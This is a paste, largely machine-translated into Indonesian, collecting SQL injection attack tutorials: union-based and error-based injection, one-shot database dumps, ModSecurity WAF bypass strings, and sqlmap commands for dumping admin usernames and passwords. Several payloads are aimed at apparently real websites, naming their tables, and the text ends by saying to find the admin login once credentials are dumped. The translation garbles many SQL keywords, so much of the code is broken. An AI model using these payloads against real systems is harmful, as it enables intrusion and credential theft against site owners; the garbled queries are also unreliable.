Guest User

all about sql

a guest
Jul 25th, 2018
827
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 190.34 KB | None | 0 0
  1. Bagaimana menemukan Kolom yang Rentan? 25 25 25
  2. ANS: -
  3. Teknik 1: -
  4. gunakan -> id = -1 union pilih 1,2,3,4,5--
  5. use -> id = 1111/9999 / null / bybysql union pilih 1,2,3,4,5--
  6. use -> id = .1 / 1.2 / 12.4 union pilih 1,2,3,4,5--
  7.  
  8. Catatan: - Saya menggunakan null dan bybysql. Tidak bingung dengan mereka, kamu bisa menggunakan watever u like means menggunakan data yang tidak ada [Thanks to Hack Forum]
  9.  
  10. Teknik ke-2: - Parameter Salah
  11. Di sini Parameter Salah berarti meletakkan sesuatu yang membuat respons yang salah ke dalam PARAMETER SQL kami
  12. (a) 1 = 2, 1 = 0
  13. use -> id = 1 atau 1 = 2 union pilih 1,2,3,4,5--
  14. use -> id = 1 atau 1 = 0 union pilih 1,2,3,4,5--
  15.  
  16. (B) Juga dapat kita gunakan memiliki, seperti, <>
  17. gunakan -> id = 1 memiliki / HAVING 1 = 2 union pilih 1,2,3,4,5--
  18. gunakan -> id = 1 1 suka / LIKE 2 union pilih 1,2,3,4,5--
  19. use -> id = 1 1 <> 1 union pilih 1,2,3,4,5--
  20. use -> id = 1 {having / and} 1 like 2 union pilih 1,2,3,4,5--
  21. use -> id = 1 {having / and} 1 <> 1 union pilih 1,2,3,4,5-- / * gunakan apakah memiliki atau dan
  22.  
  23. Juga Anda dapat menggunakan dan pernyataan palsu / DAN SALAH
  24. gunakan -> id = 1 dan false union pilih 1,2,3,4,5--
  25.  
  26. Teknik ke-3: - Bagi dengan 0 berarti -> / 0 dan + div + 0
  27. use -> id = 12/0 union pilih 1,2,3,4,5--
  28.  
  29. gunakan -> id = 12 + div + 0 + union pilih 1,2,3,4,5--
  30.  
  31. Teknik ke-4: - Perhatikan dengan seksama, atau gores kode sumber HTML
  32.  
  33. Jumlahnya dapat ditampilkan di mana saja, ketika agak kasar, cukup ubah kueri untuk membuat semuanya lebih terlihat seperti sesuatu
  34.  
  35. http://somesite.net/b.php?id=12/0 union pilih 1111,2222,3333,4444,5555--
  36.  
  37. Di atas kita menggunakan 1111, 2222 bukannya 1,2 masing-masing
  38.  
  39. Setelah menulis kode kode sumber terbuka, cari 'Nomor Kolom' seperti 1111,2222,3333,4444,5555 dengan menggunakan (CTRL + F: - Untuk menemukan sesuatu dalam kode sumber) Kemudian periksa di mana nomor dat muncul dalam kode sumber
  40.  
  41. Terkadang nomor ditampilkan pada judul halaman.
  42.  
  43. Ketika Anda mendapatkan kolom yang rentan maka Anda ingin menampilkan versi, pengguna, basis data atau beberapa bagian html untuk dapat dilihat di halaman. Jadi, 4 langkah. Ikuti Langkah-langkah ini: -
  44.  
  45. i.) id = -1 union pilih 1111,2222, concat (0x223e, @@ version, 0x3c696d67207372633d22), 4444--
  46. Dimana
  47. 223e => ">
  48. 3c696d67207372633d22 => <img src = "
  49. * Ingat kita menggunakan 0x sehingga dat diatas kode hex berfungsi
  50.  
  51. ii.) 4 cetak nama kami
  52. id = -1 union pilih 1111,2222, concat (0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d), 4444--
  53. Dimana
  54. 0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d => \ "> <font color = red size = 4> AAKASH </ font> <! -
  55.  
  56. Teknik ke-5: -
  57. U mencoba semua teknik di atas tetapi stille tidak bisa mendapatkan kolom rentan maka u juga dapat menggunakan teknik kelima ini .... Wats baru dalam teknik ini Lihat: -
  58.  
  59. Anda dapat menggunakan serikat pilih 1,2,3,4,5-- sebagai serikat (pilih 1,2,3,4,5) -
  60. gunakan: - id = -2 union (pilih 1,2,3,4,5) -
  61. / * Jika Anda melihat vul col seperti 3 kemudian
  62.  
  63. gunakan: - id = -2 union (pilih 1,2,333 (4 cek) / @@ versi, 4,5) -
  64.  
  65. Teknik 6: - Parameter Benar
  66.  
  67. gunakan -> id = 1 + di mana + 1 = 1 union pilih 1,2,3,4,5--
  68. use -> id = 1 + dan + 50 = 50 union pilih 1,2,3,4,5--
  69. use -> id = 1 = 75 = 75 union pilih 1,2,3,4,5--
  70.  
  71. Teknik 7: - Brute memaksa kolom / * Terima kasih kepada Master saya Devilhunter Dante
  72. Frnds ketika Anda tidak dapat menemukan jumlah kolom maka Anda juga dapat menggunakan teknik ini. Dengan teknik ini tidak hanya Anda menemukan sejumlah kolom, Anda juga mendapatkan kolom yang rentan.
  73. Ikuti langkah-langkah berikut
  74. 1st do -> union pilih 1--
  75. 2nd do -> union pilih 1,2--
  76. 3rd do -> union pilih 1,2,3--
  77. 4th do -> union slect 1,2,3,4--
  78. 5th do -> union pilih 1,2,3,4,5--
  79.  
  80. © AKDK
  81.  
  82. ~ h
  83.  
  84.  
  85.  
  86. Error Based Dump In One Shot (DIOS) - Oleh Ph.h4rh4r
  87.  
  88. Kami Telah Mendiskusikan di Tutorial Kami Sebelumnya Tentang Injeksi SQL Berbasis Kesalahan.
  89. Dalam Tutorial Ini Anda Akan Mempelajari Cara Membangun Error Based Dump In Shot (DIOS).
  90. Seperti yang Kita Ketahui Bahwa dalam Error Based Query, Kami Memberikan Perintah Kami Ke server dan Memberikan Kami menghasilkan kesalahan.
  91.  
  92. Jika Kami Ingin Mendapatkan versi () maka kami Berikan Permintaan Seperti ini.
  93.  
  94. http://www.FakeSite.com/news.php?id=11 atau 1 grup oleh concat_ws (0x3a, versi (), lantai (rand (0) * 2)) memiliki min (0) atau 1-- -
  95.  
  96. kami mendapatkan versi tercetak di halaman. versi = 5.5.42-cll
  97.  
  98. Sekarang Mari kita dapatkan nama Database Primer.
  99. http://www.FakeSite.com/news.php?id=11 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
  100. dan Ini Database Primer kami.
  101.  
  102. ini nama Database Primer "kkbaketo_wordpress" jadi ini adalah nama Database Primer kami. jika kita ingin mendapatkan yang lain kita biasanya Meningkatkan LIMIT 0,1 hingga LIMIT 1,1
  103.  
  104. Tetapi kita juga bisa mendapatkan semua Database tanpa menggunakan LIMIT.
  105. Inilah SYNTAX untuk Mendapatkan Semua Database.
  106.  
  107. (SELECT! X- ~ 0.FROM (SELECT (concat (0x3a3a3a, (pilih group_concat (schema_name) dari information_schema.schemata))) x) a)
  108.  
  109. Sekarang Tambahkan SYNTAX ini untuk Dapatkan semua Databasis.
  110.  
  111. http://www.FakeSite.com/news.php?id=(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat (schema_name) dari information_schema.schemata))) x) a) - - -
  112.  
  113. dan ini Database kami.
  114.  
  115. information_schema, kkbaketo_wordpress
  116.  
  117. Langkah selanjutnya adalah Dapatkan The Tables.
  118. Inilah contohnya.
  119. http://www.FakeSite.com/news.php?id=11 atau 1 grup oleh concat_ws (0x7e, (pilih table_name dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) memiliki min (0) atau 1-- -
  120. dan kami Dapatkan Nama tabel di bawah Respons kesalahan ::
  121.  
  122. Kami Hanya MENDAPATKAN satu Nama TABEL. kkbaketop_category
  123.  
  124. Ini adalah nama Tabel Pertama Kami. Kita Dapat Mendapat Satu Selanjutnya dan Yang Lain dengan Meningkatkan Nilai LIMIT 0,1 hingga LIMIT 2,1 LIMIT 3,1
  125. Kami Meningkatkan BATAS untuk Tabel.
  126. LIMIT 0,1 untuk tabel 1.
  127. LIMIT 1,1 untuk tabel ke-2.
  128. Seperti yang Kita Ketahui bahwa kita Dapat DUMP Semua Tabel dan Kolom Dalam injeksi BERBASIS UNION.
  129. dalam ERROR BASED Dump dalam satu Shot (DIOS) kita tidak dapat Dump All Tables / Columns seperti UNION BASED Injection.
  130. Tapi Kita Bisa Dapatkan Beberapa Tabel / Kolom dari Basis Data dengan MEMBANGUN Kueri kami.
  131.  
  132.  
  133. Berikut ini adalah SYNTAX Kami untuk Tabel.
  134.  
  135. (pilih group_concat (table_name) dari information_schema.tables di mana table_schema = database ())
  136.  
  137. Sekarang tambahkan SYNTAX ini di DIOS Query kami.
  138.  
  139. (SELECT! X- ~ 0 ./*! 50000FROM * / (/ *! 50000SELECT * / (/ *! 50000concat_ws * / (0x3a3a3a, (pilih group_concat (table_name) dari information_schema.tables di mana table_schema = database ()))) x) a)
  140.  
  141.  
  142. DIOS Query kami Siap untuk Tabel.
  143.  
  144. http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat (table_name) dari information_schema.tables di mana table_schema = database ()))) x) a) - -
  145.  
  146. Ini Meja Kami.
  147.  
  148. kkbaketop_admin, kkbaketop_category, kkbaketop_content, kkbaketop_contentOld, kkbaketop_meta, kkbaketop_navigation, kkbaketop_product
  149.  
  150. Kami Juga dapat HTML TAG untuk menampilkan Semua Tabel di Saluran Baru.
  151. HTML TAG = <BR>
  152. kita bisa menggunakannya dengan mengkodekannya di HEX Value atau Menempatkan Single Quote Sebelum dan Sesudah TAG HTML.
  153. HEX Value = 3c42523e kita harus menggunakan 0x sebelum Nilai HEX untuk Menggunakan TAG HTML.
  154. HEX Value = 0x3c42523e
  155. Menempatkan Kutipan Tunggal = '<BR>'
  156.  
  157. PUT TAG HTML Sebelum Table_name.
  158. Hmmm sekarang Memungkinkan Tambahkan Tag ini ke Error Based DIOS Query kami dan jalankan.
  159.  
  160. http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat ('<BR>', table_name) dari information_schema.tables di mana table_schema = database ()))) x) a) - -
  161.  
  162. Sekarang Semua Tabel berada dalam garis BARU.
  163.  
  164. Langkah Berikutnya adalah Kita Harus Mendapatkan Kolom.
  165.  
  166. Ini adalah SYNTAX untuk Kolom.
  167.  
  168. (pilih group_concat (3c42523e, table_name, 0x3a, column_name) dari information_schema.columns di mana table_schema = database ())
  169.  
  170. Tambahkan SYNTAX ini di DIOS Query dan Execute it untuk Mendapatkan Kolom dari Setiap Tabel.
  171.  
  172. Dan berikut adalah DIOS FINAL Pertanyaan untuk Tabel dan Kolom Berbasis Kesalahan dalam satu SHOT.
  173.  
  174. http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat ('<BR>', table_name, 0x3a, column_name) dari information_schema.columns di mana table_schema = database ()))) x) a) - -
  175. ©
  176. ~ Ph.h4rh4r
  177.  
  178.  
  179. Error Based Injection -Tutorial (Ph.h4rh4r)
  180. Setelah Union Based Injection Dalam Tutorial ini Anda Akan Mempelajari Error Based SQL Injection.
  181. Bagaimana Anda Akan Memahami Bahwa WebSite Target kami dalam Injeksi Berbasis Kesalahan. ??
  182. Hmm Sementara kita adalah Situs Suntik, Dan Hitung Jumlah Total Kolom dan Kemudian Bangun Query SQL Berbasis Serikat.
  183.  
  184. Kami mendapat 6 Jumlah Kolom. dan UNION BASED Query kami.
  185.  
  186. http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6-- -
  187.  
  188. Ketika kami Melaksanakan Query Berbasis Persatuan kami tidak memberikan kami Nomor Kolom yang Rentan yang Dicetak di Halaman Web atau dalam HTML.
  189. Ini Memberi Kita Pesan Kesalahan.
  190.  
  191. Pernyataan SELECT yang digunakan memiliki jumlah kolom yang berbeda
  192.  
  193. Kadang-kadang Situs TARGET tidak Memberikan Nomor Kolom yang Rentan dan Juga Tidak Ada Jenis Kesalahan. Situs-situs tersebut juga error SQL / Double Query SQL injection.
  194. Jadi Kami Diolah Selanjutnya Dengan Error Based Queries.
  195.  
  196. Langkah pertama adalah Untuk Mendapatkan Versi.
  197. Berikut adalah Query Berdasarkan Kesalahan Untuk Dapatkan Versi.
  198.  
  199. http://www.target.com/index.php?id=1 atau 1 grup oleh concat_ws (0x3a, versi (), lantai (rand (0) * 2)) memiliki min (0) atau 1-- -
  200.  
  201. dan kami Akan Mendapatkan Versi Dicetak di WebPage.
  202.  
  203.  
  204. Langkah kedua adalah Untuk Mendapatkan Nama Database.
  205.  
  206. Sekarang Mari Periksa Nama Database Saat Ini.
  207. Situs Web Dapat Memiliki Lebih dari 2, 3, atau 5 Basis Data. Jadi Kami Gunakan BATAS untuk mendapatkan semua Database.
  208.  
  209. LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
  210.  
  211. Inilah Pertanyaan Kami Untuk Mendapatkan Basis Data.
  212.  
  213. http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
  214.  
  215.  
  216. Langkah ketiga adalah untuk mendapatkan tabel.
  217. Sekarang Kita Harus Mendapat Tabel. Seperti Kami Ingin Tabel Dari Database Primer.
  218. Berikut Ini Query Untuk Tabel Dari Database Primer.
  219. http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (table_name sebagai char), 0x7e)) dari information_schema. tabel di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
  220.  
  221. Tingkatkan Nilai Batas sebagai LIMIT 0,1 hingga LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
  222. Sampai Anda Mendapatkan Nama Tabel yang Diinginkan Anda.
  223.  
  224. Langkah ke 4 adalah Mendapatkan Nama Kolom Dari Nama Tabel Bertarget Kami.
  225. Sekarang Kita Harus Mendapatkan Nama Kolom Dari Nama Tabel.
  226. Kami Mendapat Tabel Of Admin.
  227. Jadi Mari Dapatkan Kolom Dari Admin Tabel.
  228.  
  229. Berikut Ini Query Untuk Mendapatkan Nama Kolom Dari Tabel Admin.
  230.  
  231. http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e)) dari information_schema. kolom di mana table_name = 0xADMIN membatasi 0,1), lantai (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
  232.  
  233. Untuk Mendapatkan Kolom Dari Tabel Admin kita Harus Mengkodekannya Di HEX dan Kemudian Kita Dapat Melaksanakan Permintaan Kita.
  234. Inilah BAGIAN dalam Pertanyaan Kita.
  235.  
  236. Table_name = ADMIN
  237. Inilah Nilai HEX dari ADMIN = 61646d696e
  238. Dan Letakkan Dengan 0x untuk Membuat Kueri yang Benar.
  239.  
  240. Table_name = 0x61646d696e
  241.  
  242. Dan Inilah Kueri.
  243. http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e)) dari information_schema. kolom di mana table_name = 0x61646d696e limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
  244.  
  245. Tingkatkan Nilai BATAS menjadi BATAS 0,1 LIMIT 1,1 LIMIT 2,1
  246. sampai kita Dapatkan Nama Kolom Seperti Nama Pengguna dan Kata Sandi.
  247.  
  248. 5Th Step Is to Extracting Data From Columns.
  249. Setelah Kami Dapatkan Nama Kolom Seperti Nama Pengguna Dan Kata Sandi.
  250. Langkah Berikutnya Adalah Mengeluarkan Data Dari Kolom Ini.
  251.  
  252. Berikut ini adalah Query Untuk Mengekstrak Data dari Kolom.
  253.  
  254. http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (COLUMN_NAME_1,0x3a, COLUMN_NAME_2) sebagai char) , 0x3a)) dari batas TABLENAME 0,1), lantai (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
  255.  
  256. KAMI Letakkan TABLENAME = Admin
  257. Dan
  258. Column_name_1 = nama pengguna
  259. Column_name_2 = kata sandi
  260.  
  261. Jadi, inilah Query FINAL.
  262.  
  263. http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (nama pengguna, 0x3a, kata sandi) sebagai char) , 0x3a)) dari batas admin 0,1), lantai (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
  264.  
  265. Dan Kami Dapatkan Nama Pengguna dan Kata Sandi ADMIN yang tercetak di Halaman.
  266.  
  267. ~ Ph.h4rh4r
  268.  
  269.  
  270.  
  271. Amir Hossan Rahel
  272. http://www.realinstruments.ca/gallery.php?id=7 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7--+
  273. hello sir how I can bypass 'union select' please help me or post it your page thank you
  274.  
  275. Real Instruments - Photo Gallery - 161 Maypoint Rd, Charlottetown, PEI
  276. realinstruments.ca
  277. 1 · Suka · Tanggapi · Balas · Laporkan · 23 Jan
  278. SQLI Tutorial - Beginners
  279. http://www.realinstruments.ca/gallery.php?id=.7 unUNIONion seSELECTlect 11111111,2,3,4,5,6,7-- -
  280.  
  281. Real Instruments - Photo Gallery - 161 Maypoint Rd, Charlottetown, PEI
  282. realinstruments.ca
  283. Suka · Tanggapi · Balas · Laporkan · 23 Jan
  284. SQLI Tutorial - Beginners
  285. SQLI Tutorial - Beginners
  286. No problem
  287. SQLI Tutor... membalas · Lihat semua 2 balasan
  288.  
  289.  
  290.  
  291. Modsecurity WAF Bypass vectors
  292.  
  293. --new version--
  294. id=@:=(-- a %0a select 123 from {f table})|0.1union-- a %0a select+1,@,3
  295. id=@:=(-- a %0a select 123 from {f table})*.9union/*!%0aselect 1,@,3*/
  296. id=@:=(%23 a %0a select 123 from {f table})-\Nunion%23 a %0a select+1,@,3
  297. id=@:=(%23 a %0a select 123 from ((table)))/1e0union%23 a %0a select+1,@,3
  298. id=@:=(%23 a %0a select 123 from ((table)))/1e0union%a0(select 1,@,3)
  299.  
  300. --old version--
  301. id=1-.0union distinctrow select 1,2,3 from {f table}
  302. id=-1 /*!50000union*/ select 1,2,.3from table
  303. id=-1e0union distinct select 1,2,3e0from table
  304. id=\Nunion (select 1,2,\Nfrom table)
  305. id=.1union distinct select sql_cache 1,2,3 from table
  306.  
  307. -h
  308.  
  309. mysql injection concat() replacements
  310.  
  311. select export_set(1,version(),user(),' : ',2);
  312. 5.1.7 : my_user
  313.  
  314. select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);
  315. 5.1.7 : my_user : my_db
  316.  
  317. select make_set(7,version(),user(),schema());
  318. 5.1.7,my_user,my_db
  319.  
  320. select replace(make_set(7,version(),user(),schema()),',',' : ');
  321. 5.1.7 : my_user : my_db
  322.  
  323. select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ');
  324. 5.1.7 : my_user
  325.  
  326. select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : ');
  327. 5.1.7 : my_user : my_db
  328.  
  329. select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());
  330. 5.1.7 : my_user
  331.  
  332. select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());
  333. 5.1.7 : my_user : my_db
  334.  
  335. select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version())
  336. 5.1.7 : my_user
  337.  
  338. select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());
  339. 5.1.7 : my_user : my_db
  340.  
  341. select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());
  342. 5.1.7 : my_user
  343.  
  344. select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());
  345. 5.1.7 : my_user : my_db
  346.  
  347. group_concat() without comma-
  348. select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);
  349. 5.1.7 : my_user : my_db
  350.  
  351. concat() waf bypass-
  352. /*!50000group_coNcat(*/)
  353. /*!50000coNcat(*/)
  354. `coNcat`%0a%0b%0c%0d%a0()
  355. {snoopdogg concat()}
  356. {s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}
  357. {s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}
  358. {s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}}
  359. concat-- a%0a()
  360. concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)
  361. concat/**x**/()
  362.  
  363.  
  364.  
  365. waf bypass with %75nion %73elect
  366. redirect = bypass with And 1<1 or add @ befor variable number like =@64' or =@'
  367. there redirect with dot in =.64' bypass by add @ like =@64' and 0 union select
  368.  
  369. ~h
  370.  
  371.  
  372. Multi-Query-Injection
  373.  
  374. id=1-- -' our query-- -
  375. id=1%23' our query -- -
  376. id=1 union select null,null,null-- -' our query %23
  377.  
  378. =1 ;%00 ' and 0 union select 1 ;%00!
  379. =1 -- - ' and 0 union select 1 -- -%
  380. =1 -- - ' or 1 union select 1,2 limit 2 -- -
  381.  
  382. -----------------------------------------------------------
  383. Other Method
  384.  
  385. =1' in boolean mode) UNION SELECT 1,2-- -
  386. =1' group by 1 union select 1,2-- -
  387. =1' procedure analyse() union select 1,2-- -
  388. =1) having 1=0 union select '11111' from dual -- - Where 0 %23
  389. =1 union select 1 LIMIT 0,1-- -
  390. '=0=column union select version() limit 1-- -
  391.  
  392. ~h
  393.  
  394.  
  395. Error based basic Tidak terlalu detail
  396. Cara pertama =====>
  397. + DAN (SELECT COUNT (*) FROM (SELECT 1 UNION SELECT null UNION SELECT! 1) x GROUP oleh CONCAT ((versi SELECT () FROM information_schema.tables LIMIT 0,1), FLOOR (RAND (0) * 2)) )
  398. Cara kedua ====> packerss.in/review.php?id=260+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3) x + grup + oleh + concat (mid ((pilih + concat_ws (0x7e, versi (), 0x7e) + dari + information_schema.tables + limit + 0,1), 1,25), floor (rand (0) * 2))) a) -
  399. ===>
  400. Database ===> packerss.in/review.php?id=260%20+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3) x + grup + oleh + concat (mid ((pilih + concat_ws (0x7e, group_concat (schema_name), 0x7e) + dari + information_schema.schemata% 20limit + 0,1), 1,25), floor (rand (0 ) * 2))) a) -
  401. ==> Masukan 'informasi' duplikat
  402. skema, packer1 'untuk kunci' grup_
  403. kunci'
  404. tabel ===>
  405. packerss.in/review.php?id=260%20+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group + dengan + concat (mid ((pilih + concat_ws (0x7e, group_concat (table_name), 0x7e) + dari + information_schema.tables% 20where% 20table_schema = database ()% 20limit + 0,1), 1,25), lantai ( rand (0) * 2))) a) -
  406. ===> Masukan duplikat 'tambah, admin, astro_
  407. ques, astr1 'untuk kunci' group_key '
  408. packerss.in/review.php?id=260+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2union+select+3)x+group+by + concat (mid ((pilih + concat_ws (0x7e, group_concat (table_name), 0x7e) + dari + information_schema.tables% 20where% 20table_schema = database ()% 20limit + 0,1), 58,25), lantai (rand ( 0) * 2))) a) -
  409. ===> Entri duplikat
  410. 'Laints, acara, mengundang, bergabung, 1' untuk kunci
  411. 'group_key'
  412. + dan + (pilih + 1 + dari + (pilih + count (*) + dari + (pilih + 1 + union + pilih + 2 + union + pilih + 3) x + grup + dengan + concat (mid ((pilih + concat_ws (0x7e, group_concat (column_name), 0x7e) + f rom + information_schema.columns di mana table_name = 0xHex_Table limit + 0,1), 1,25), floor (rand (0) * 2))) a) - x
  413. + dan + (pilih + 1 + dari + (pilih + count (*) + dari + (pilih + 1 + union + pilih + 2 + union + pilih + 3) x + grup + dengan + concat (mid ((pilih + concat_ws (0x7e, group_concat (nama pengguna, 0x3a, passwo rd), 0x7e) + dari + pengguna limit + 0,1), 1,25), lantai (rand (0) * 2))) a) -
  414.  
  415. -h
  416.  
  417.  
  418.  
  419. Hi everyone,Today I'll show you a SQLI TIP,
  420. get large data with one request using substr function. use 'limit' is slow,
  421. so im gonna teach you how to bypass the error 1242,"'subquery
  422. returns more than 1 row'".
  423. I) Using substr function
  424. ==
  425. the subtr function is usually for blind
  426. injection,but we can use this for bypass the limit
  427. of group_concat and the error 1242.
  428. for example,
  429.  
  430. Code:
  431.  
  432. http://www.lermitagehotel.ee/?
  433. pageid=160 +and+(select+1+from
  434. +(select+count(*),concat((select
  435. (select+concat(concat(user_na
  436. me,0x3a,user_pass),0x7e))+from
  437. +users+limit+0,1),floor(rand
  438. (0)*2))x+from+informat
  439. ion_schema.tables+group+by+x)a)
  440. error 1242-
  441.  
  442. Subquery returns more than 1 row.
  443. we can use substr like that
  444.  
  445. Code:
  446.  
  447. And(select 1 from(select count
  448. (*),concat(0x3a,(select substr
  449. (group_concat(column1,0x3a,column2),1,150)from table where table_schema like database()),0x3a,floor(rand(0)*2))xfrom information_schema.tables group by x)z)-- -
  450.  
  451. so
  452. Code:
  453.  
  454. http://www.lermitagehotel.ee/?
  455. pageid=160 And(select 1 from
  456. (select count(*),concat(0x3a,
  457. (select substr(group_concat
  458. (table_name),1,150)from
  459. information_schema.tables where
  460. table_schema like database
  461. ()),0x3a,floor(rand(0)*2))x from
  462. information_schema.tables group
  463. by x)z)-- -
  464. and
  465.  
  466. Quote: Duplicate entry
  467. ':admin_topmenu,album_photos,albums,
  468. defaults,form_items,form_log,' for key
  469. 'group_key'
  470. Incre substr(group_concat(table_name),1,150) ...
  471. substr(group_concat(table_name),30,150)... to
  472. get next
  473. --
  474.  
  475. in mysql>5
  476. Code:
  477. or 1 group by concat_ws(0x3a,
  478. (select substr(group_concat
  479. (column),1,150)
  480. from table),floor(rand(0)*2))
  481. having min(0) or 1-- -
  482. --
  483. in mysql 5.1+
  484. Code:
  485. and updatexml(0,concat(0x3a,
  486. (select substr(group_concat
  487. (column),1,150)
  488. from table)),0)-- -
  489. --
  490. notice: sometimes query number 2 dosent
  491. work,so use the first one.
  492. Code:
  493. II) Using concat() and group_concat
  494. ()
  495. ==
  496. Code:
  497. and updatexml(0,concat(0x3a,
  498. (select concat(0x3a,group_concat
  499. (column))
  500. from table)),0)-- -
  501. only for extractvalue() / updatexml().
  502.  
  503. enjoy
  504.  
  505. ~h
  506.  
  507.  
  508. HACK WEBSITE MENGGUNAKAN SQLMAP SQL INJECTION TOOLS FULL TUTORIAL
  509.  
  510. bagaimana cara menggunakan sqlmap pada metode GET
  511.  
  512.  
  513. - fingerprinting
  514.  
  515. pertama Anda harus memiliki situs web yang rentan untuk target, jika Anda memiliki target sekarang buka sqlmap dan ketik perintah ini
  516. ./sqlmap.py -u "http://www.target.com/index.php?id=2"
  517. sqlmap akan mendeteksi rentan dari target Anda dan akan memberi tahu Anda apa jenis rentan dan apa tipe database. dan jika target Anda rentan, lanjutkan ke langkah berikutnya.
  518.  
  519.  
  520. - temukan nama database
  521.  
  522. ketik perintah ini untuk mencari nama database
  523. ./sqlmap.py -u "http://www.target.com/index.php?id=2" --dbs
  524. pada langkah ini, sqlmap akan menemukan nama database target Anda, misalnya saya menggunakan "web_db" untuk nama database.
  525.  
  526.  
  527. - temukan nama tabel
  528.  
  529. Setelah sqlmap menemukan nama databse waktunya untuk menemukan nama tabel. gunakan perintah ini untuk menemukan nama tabel
  530. ./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db --table
  531. di sana akan menunjukkan kepada Anda beberapa nama tabel di dalam database "web_db", ok misalnya saya menggunakan "tbl_admin" sebagai nama tabel.
  532.  
  533.  
  534. - temukan nama kolom
  535.  
  536. waktunya untuk menemukan apa yang ada di dalam "tbl_admin" dari "web_db" dan kami menyebutnya kolom. untuk menemukan kolom ketik perintah ini
  537. ./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin --columns
  538. ini akan menunjukkan daftar nama kolom, misalnya saya menemukan kolom "pengguna" dan "kata sandi".
  539.  
  540.  
  541. - buang
  542.  
  543. perintah ini akan membuang data dari kolom, ketik perintah ini
  544. ./sqlmap.py -u "http://www.target.com/index.php?id=2" -D web_db -T tbl_admin -C pengguna, kata sandi --dump
  545. dan saya menemukan "user = admin" dan "password = adminpass". sekarang buka web dan temukan admin login.
  546.  
  547. bagaimana cara menggunakan sqlmap pada metode POST
  548.  
  549.  
  550. caranya sama dengan metode GET, hanya saja Anda harus memasukkan data POST ke sqlmap. misalnya saya memiliki situs yang rentan pada jalur "login.php". data POST adalah "id = admin & pwd = kata sandi & kirim = login". bagaimana cara menemukan data POST? cukup gunakan "Live HTTPheaders" yang merupakan add ons firefox.
  551.  
  552.  
  553. - fingerprinting
  554.  
  555. caranya yang sama dengan metode GET, ketikkan saja perintah ini
  556. ./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = login"
  557.  
  558. - temukan nama database
  559.  
  560. ./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" --dbs
  561.  
  562. - temukan nama tabel
  563.  
  564. ./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" -D web_db --table
  565.  
  566. - temukan nama kolom
  567.  
  568. ./sqlmap.py -u "http://www.target.com/login.php" --data = "id = admin & pwd = kata sandi & kirim = masuk" -D web_db -T tbl_admin - kolom
